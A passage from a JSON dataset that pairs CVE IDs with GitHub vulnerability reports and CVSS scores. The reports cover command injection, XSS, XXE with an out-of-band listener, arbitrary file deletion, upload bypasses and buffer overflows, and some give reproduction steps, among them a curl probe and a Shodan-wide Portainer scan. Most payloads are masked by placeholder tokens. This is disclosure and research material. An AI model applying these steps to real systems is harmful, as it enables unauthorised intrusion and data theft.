        "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/1303",
        "Repo_new": "caddyserver/caddy",
        "Issue_Created_At": "2016-12-19T09:58:02Z",
        "description": "Caddy serves wrong SSL cert for http only sites NUMBERTAG What version of Caddy are you running ( APITAG )? APITAG NUMBERTAG What are you trying to do? I want to have multiple virtual hosts, some http s , some http only. I want the http only hosts to not respond to http s requests with a wrong certificate NUMBERTAG What is your entire Caddyfile? APITAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? I created the reproducible example from above on my Mac ( APITAG ) but I am having this problem in production on APITAG so I don\u2019t think it is OS related. The working directory contains the Caddyfile from above. APITAG NUMBERTAG What did you expect to see? Caddy starts fine and serves both vhosts, one with https and the other with http. I expect Caddy to not respond at all when I try to access APITAG as that virtual hosts is explicitly configured as http, not http s NUMBERTAG What did you see instead (give full error messages and/or log)? When accessing APITAG (the host which is explicitly http), Caddy sends the cert for APITAG , which results in an SSL error. (I know that in this example it always results in an error because the cert is self signed, but in production this would serve a trusted cert from Let\u2019s Encrypt). When ignoring the warning, Caddy responds with APITAG . While this is technically correct, Caddy should not accept the connection in the first place. In addition to the SSL error, this also leaks information about at least one other site (the one Caddy takes the certificate from) that is set up on the host NUMBERTAG How can someone who is starting from scratch reproduce this behavior as minimally as possible NUMBERTAG Use the Caddyfile from step NUMBERTAG Update the root directive so that Caddy finds some files to serve NUMBERTAG Edit your APITAG to include the following NUMBERTAG Start Caddy as described in step NUMBERTAG APITAG Thanks so much for any responses. I\u2019m sorry if there is already an issue for this or if this is a known bug, I couldn\u2019t find anything related to this.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-19168",
        "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/250",
        "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/250",
        "Repo_new": "xtr4nge/fruitywifi",
        "Issue_Created_At": "2018-11-10T21:41:51Z",
        "description": "Unauthorized remote code execution as root. APITAG contains two security vulnerabilities that allow an unauthorized attacker to take complete control over the system. The first vulnerability has already been released by another researcher and was assigned APITAG : > APITAG (aka APITAG NUMBERTAG allows remote attackers to execute arbitrary commands via shell metacharacters in the io_mode, ap_mode, io_action, io_in_iface, io_in_set, io_in_ip, io_in_mask, io_in_gw, io_out_iface, io_out_set, io_out_mask, io_out_gw, iface, or domain parameter to PATHTAG or the APITAG hostapd_secure, hostapd_wpa_passphrase, or supplicant_ssid parameter to FILETAG . Now to exploit this vulnerability an attacker needs a valid session, but it turns out that command injection is also possible in a file that lacks any access control. The file APITAG is accessible to anyone (erroneously?) and the validation attempt in APITAG can be bypassed. So a POST request to APITAG with a APITAG value of APITAG will execute APITAG . Even if the regex used in APITAG were correct it would still be to lenient (because it allows APITAG and spaces).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19170",
        "Issue_Url_old": "https://github.com/JpressProjects/jpress/issues/89",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/89",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2018-11-08T11:38:08Z",
        "description": "There is a stored xss via PATHTAG Hello,my nickname is isecream,I found three stored xss in the form First, access the page FILETAG FILETAG then use the payload: \"> APITAG FILETAG when i submit FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19178",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/6",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/6",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2018-11-09T04:05:00Z",
        "description": "APITAG filter is APITAG leads to storage XSS vulnerabilities NUMBERTAG ulnerability analysis Code PATHTAG It can be seen that there is no good filtering in parameter filtering. package APITAG import APITAG import APITAG import APITAG / XSS\u653b\u51fb\u5904\u7406 Created by zchuanzhao on PATHTAG / public class APITAG extends APITAG { public APITAG APITAG { APITAG } MENTIONTAG public String FILETAG Trigger the savings XSS vulnerability FILETAG Likewise, enter the content in the comments section of the post\uff1a APITAG FILETAG APITAG filter is APITAG leads to storage XSS vulnerabilities FILETAG NUMBERTAG bug fi NUMBERTAG Coding unification The encoding of each data layer of the site is uniform, and it is recommended to use all utf NUMBERTAG encoding. The inconsistency of upper and lower encoding may cause some filtering models to be bypassed NUMBERTAG Http Only cookie The purpose of many XSS attacks is to obtain the user's cookie, marking the important cookie as HTTP only, so that when the browser makes a request to the server, it will bring the cookie field, but the cookie cannot be accessed in the script. In this way, the XSS attack can avoid using js's APITAG to acquire the cookie NUMBERTAG Input content length control For untrusted input, you should limit it to a reasonable APITAG it cannot completely prevent XSS from happening, it can increase the difficulty of XSS attack NUMBERTAG Input check Input check is generally to check whether the data entered by the user contains some special characters, such as <, >, ', ', etc. If special characters are found, these characters are filtered or coded.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19180",
        "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/1",
        "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/1",
        "Repo_new": "doublefast/yunucms",
        "Issue_Created_At": "2018-11-09T06:58:06Z",
        "description": "Arbitrary File Deletion & Launch a new installation process to execute PHP code. Two issue was discovered in yunucms NUMBERTAG APITAG File Deletion APITAG a new installation process to execute PHP code APITAG is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file The code section which made this vulnerability possible is found in the PATHTAG file: line NUMBERTAG ERRORTAG In the APITAG function shown above, the content of $_POST FILETAG APITAG has been removed. APITAG a new installation process to execute PHP code After remove APITAG \uff0cremote attackers can Launch a new installation process. The code section which made this vulnerability possible is found in the PATHTAG file: line NUMBERTAG CODETAG Follow function APITAG PATHTAG file: line NUMBERTAG ERRORTAG Use file_put_contents to wirte $arr into APITAG POC In installation process setup2 ,we can input APITAG to \u6570\u636e\u8868\u524d\u7f00 DB_PREFIX FILETAG When finish installation process\uff0cwe can get FILETAG like this: FILETAG Visit homepage URLTAG create file PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19182",
        "Issue_Url_old": "https://github.com/engelsystem/engelsystem/issues/494",
        "Issue_Url_new": "https://github.com/engelsystem/engelsystem/issues/494",
        "Repo_new": "engelsystem/engelsystem",
        "Issue_Created_At": "2018-11-11T12:45:04Z",
        "description": "Security Vulnerability. Hi, I found a security vulnerability in engelsystem. How shall I provide more details? Best Regards mschop",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19183",
        "Issue_Url_old": "https://github.com/ethereumjs/ethereumjs-vm/issues/386",
        "Issue_Url_new": "https://github.com/ethereumjs/ethereumjs-monorepo/issues/386",
        "Repo_new": "ethereumjs/ethereumjs-monorepo",
        "Issue_Created_At": "2018-11-10T01:55:10Z",
        "description": "Unexpected runcode fail. I am using ethereumjs vm ERRORTAG function to run my contract bytecode, and I use the step event for trace output. When I set the runcode attribute APITAG , and tried to run it, I got the output of REVERT opcode, It means runcode was failed. REVERT output APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19184",
        "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18069",
        "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18069",
        "Repo_new": "ethereum/go-ethereum",
        "Issue_Created_At": "2018-11-10T04:34:36Z",
        "description": "Runtime error: invalid memory address or nil pointer dereference and a SEGV signal occurred. When we use APITAG to run the byte code. ERRORTAG the byte code is : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19185",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/87",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/87",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-11T13:49:41Z",
        "description": "Another heap buffer overflow in function APITAG This issue seems to be similiar to NUMBERTAG which is reported several days ago. Although this bug has been fixed, there is another specific APITAG sequence which can cause heap buffer overflow in another trace. The following is the special sequence and the complete version of APITAG that triggers heap buffer overflow is FILETAG . CODETAG Here is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19188",
        "Issue_Url_old": "https://github.com/payfort/payfort-php-sdk/issues/12",
        "Issue_Url_new": "https://github.com/payfort/payfort-php-sdk/issues/12",
        "Repo_new": "payfort/payfort-php-sdk",
        "Issue_Created_At": "2017-02-23T06:44:59Z",
        "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in 'fort_id' HTTP _REQUEST parameter that will be passed to \u201cpayfort php sdk APITAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow screenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19277",
        "Issue_Url_old": "https://github.com/PHPOffice/PhpSpreadsheet/issues/771",
        "Issue_Url_new": "https://github.com/phpoffice/phpspreadsheet/issues/771",
        "Repo_new": "phpoffice/phpspreadsheet",
        "Issue_Created_At": "2018-11-12T20:44:26Z",
        "description": "XXE Injection Security scan bypass. This is: CODETAG What is the expected behavior? The APITAG function is used to prevent XXE attacks. What is the current behavior? The APITAG function can be bypassed by using UTF NUMBERTAG encoding. What are the steps to reproduce? Replace the IP address and port APITAG with something you control. CODETAG FILETAG Replace APITAG in your xlsx file with the one above and re zip the excel sheet. I've attached an xlsx file that makes a request as configured above. File FILETAG Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library. Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue. Which versions of APITAG and PHP are affected? I believe it affects all versions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19277",
        "Issue_Url_old": "https://github.com/MewesK/TwigSpreadsheetBundle/issues/18",
        "Issue_Url_new": "https://github.com/mewesk/twigspreadsheetbundle/issues/18",
        "Repo_new": "mewesk/twigspreadsheetbundle",
        "Issue_Created_At": "2018-11-22T17:23:13Z",
        "description": "Update phpoffice/phpspreadsheet. It's necessary to update phpoffice/phpspreadsheet because of CVETAG See URLTAG Any plans to release an updated version of this bundle soon?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19289",
        "Issue_Url_old": "https://github.com/xCss/Valine/issues/127",
        "Issue_Url_new": "https://github.com/xcss/valine/issues/127",
        "Repo_new": "xcss/valine",
        "Issue_Created_At": "2018-11-14T17:13:13Z",
        "description": "In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.. In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable NUMBERTAG HTML injection FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19291",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/60",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/60",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2018-11-11T18:15:37Z",
        "description": "There is two CSRF vulnerability that can delete user or usergroup. Software Link : URLTAG After the administrator logged in,open the page FILETAG delete user POC: APITAG FILETAG delete group POC: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19329",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/113",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/113",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-11-17T06:38:06Z",
        "description": "There is a vulnerability that can delete the arbitrary file. After the administrator logged in, open the following link URLTAG Click the delete button\uff0cwe can get a link like this URLTAG the string APITAG is encoded by base NUMBERTAG so we can decode it \uff0cthe decoded string is PATHTAG so we can encode the string like this PATHTAG and structure the link URLTAG when we visit this link,the FILETAG file is deleted",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19353",
        "Issue_Url_old": "https://github.com/ansilove/libansilove/issues/4",
        "Issue_Url_new": "https://github.com/ansilove/libansilove/issues/4",
        "Repo_new": "ansilove/libansilove",
        "Issue_Created_At": "2018-11-18T08:25:22Z",
        "description": "A Segmentation fault. just as pic show FILETAG when the libansilove parser crafted file, it will cause a OOB if the APITAG assignned wrong as the valgrind detect, there is a APITAG read\" PATHTAG valgrind ./ansilove i poc.ans NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./ansilove i poc.ans NUMBERTAG APITAG NUMBERTAG ANSI / ASCII art to PNG converter Copyright (c NUMBERTAG Stefan Vogt, Brian Cassidy, and Frederic Cambus NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG C0: main APITAG NUMBERTAG Address NUMBERTAG a NUMBERTAG b0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2EDEB: free (in PATHTAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Input File: poc.ans Output File: FILETAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG E3D5B4: ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use track origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19360",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2186",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2186",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-11-18T23:39:02Z",
        "description": "Block more classes from polymorphic deserialization (placeholder). This is placeholder issue for fixes for as of yet unpublished CVEs, ids to be allocated. Once fix verified, included in NUMBERTAG branch, will be updated with actual ids.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19367",
        "Issue_Url_old": "https://github.com/portainer/portainer/issues/2475",
        "Issue_Url_new": "https://github.com/portainer/portainer/issues/2475",
        "Repo_new": "portainer/portainer",
        "Issue_Created_At": "2018-11-19T22:51:53Z",
        "description": "Responsible Disclosure Check if admin already created by a public API endpoint. Portainer Check if admin already created by a public API endpoint PRODUCT DESCRIPTION FILETAG IS AN OPEN SOURCE LIGHTWEIGHT MANAGEMENT UI WHICH ALLOWS YOU TO EASILY MANAGE YOUR DOCKER HOSTS OR SWARM CLUSTERS BACKGROUND Portainer until NUMBERTAG ULNERABILITY DETAILS Portainer provides an API endpoint ( PATHTAG ) to verify that the admin user is already created. This API endpoint will return ERRORTAG if admin was not created and NUMBERTAG if it was already created. This \"feature\" allows anyone to receive unauthorized access on the host when the portainer is configured incorrectly. PROOF OF CONCEPT Manual steps to reproduce the vulnerability NUMBERTAG docker run rm it p NUMBERTAG PATHTAG portainer/portainer NUMBERTAG curl X GET s o /dev/null w \"%{http_code}\" URLTAG NUMBERTAG If curl return ERRORTAG , open web browser and create a admin password. xdg open URLTAG Applying this around the world with shodan: CODETAG If you has a paid plan, you can use a filters: ERRORTAG Output example: ERRORTAG WORKAROUND Forcing the admin password by extra parameter on portainer CLI FILETAG admin password URLTAG . On source code portainer.go L NUMBERTAG L NUMBERTAG URLTAG . VULNERABILITY DISCLOSURE TIMELINE NUMBERTAG endor was contacted AUTHOR & REVISION Author: Gustavo Lichti <gustavo. EMAILTAG > Revision: More info: shodan portainer URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19376",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/114",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/114",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-11-20T17:04:18Z",
        "description": "There is a csrf vulnerability that once click a url which include payload can delect webserver log. when a authenticated administator click a url which include payload, then the webserver log will be deleted poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19417",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/600",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/600",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-11T12:21:53Z",
        "description": "Stack based buffer overflow while parsing MQTT messages (parsing PUBLISH message with variable length header). Function APITAG that parses MQTT PUBLISH messages with variable length header (see details in: URLTAG tries to memcpy input data into fixed size buffer. Allocated buffer can fit only MQTT_MAX_TOPIC_LENGTH NUMBERTAG bytes and the length check is missing. Declaration of buffer: PATHTAG struct mqtt_message { uint NUMBERTAG t mid; char topic[MQTT_MAX_TOPIC_LENGTH NUMBERTAG for string termination / PATHTAG define MQTT_MAX_TOPIC_LENGTH NUMBERTAG Overflow: PATHTAG memcpy(&conn APITAG APITAG &input_data_ptr[ pos], copy_bytes); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Proposed CVSS score: PATHTAG NUMBERTAG Critical) Mitigation : The size of data copied to topic buffer should be limited to MQTT_MAX_TOPIC_LENGTH. Crash details using Address Sanitizer (line number could not match to original sources): APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 at pc NUMBERTAG fe2a1b NUMBERTAG bp NUMBERTAG fff NUMBERTAG a NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 thread T NUMBERTAG fe2a1b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in parse_publish_vhdr PATHTAG NUMBERTAG d NUMBERTAG in tcp_input PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG ef in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG conn' APITAG NUMBERTAG e NUMBERTAG c NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Crash details from exploitable gdb plugin: CRASH SUMMARY Filename: PATHTAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: FILETAG PATHTAG Faulting Frame: None NUMBERTAG ffff NUMBERTAG in ? Disassembly: Stack Head NUMBERTAG entries): None NUMBERTAG ffff NUMBERTAG in ? None NUMBERTAG in ? Registers: ra NUMBERTAG rb NUMBERTAG a8d NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG ffff7dd1b NUMBERTAG rbp NUMBERTAG d NUMBERTAG rsp NUMBERTAG fffffffd7d0 r NUMBERTAG e NUMBERTAG r NUMBERTAG r NUMBERTAG b8 r NUMBERTAG ffff7a NUMBERTAG f0 r NUMBERTAG cc0 r NUMBERTAG fffffffd8a0 r NUMBERTAG ff NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be controlled by an attacker. END SUMMARY",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19420",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1301",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1301",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-11-14T20:30:24Z",
        "description": "APITAG allowed to some files that are able to execute HTML. Brief of this vulnerability APITAG allowed to upload the files that are able to execute HTML files. There are NUMBERTAG types of HTML executable files. HTML File with no extension HTML File with uncommon extension ( e.g. asdf) HTML encoded as EML ( Triggered in IE only ) (I also confirmed about SVG issue, but there was the issue already NUMBERTAG Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload move to APITAG with admin credential Upload prepared malformed files. HTML File with no extension Filename test APITAG HTML File with uncommon extension Filename APITAG APITAG HTML File encoded as EML Filename test.eml APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability In APITAG , Third parameter of APITAG is not exist. Function APITAG is in APITAG and Third parameter, mime , will be null. As a result, the file filtering of APITAG depend on extensions. ( Not use MIME Type ) It can allows to upload the three type files that I introduced.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.8,
        "impactScore": 2.5,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19422",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/801",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/801",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2018-11-14T19:18:24Z",
        "description": "Subrion allows to upload pht, phar extensions.. Brief of this vulnerability In uploading process, Subrion allows to upload pht, phar files. There are able to execute as PHP script following server environment. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload NUMBERTAG move to APITAG with admin credential NUMBERTAG Save php codes with pht or phar extensions. and upload it like below. APITAG NUMBERTAG Right Click and Open the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability Subrion has APITAG file for preventing execution of uploaded file. CODETAG In upload directory, APITAG did not prevent execution of the files that have the pht and phar extensions. As a result, they are able to execute as PHP script. I tested the pht extensions because my test environment is PHP NUMBERTAG so APITAG can not execute phar extension scripts as PHP. But If Subrion installed in PHP NUMBERTAG envrionment, phar extension is also able to execute as PHP.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19432",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/427",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/427",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2018-11-22T03:19:43Z",
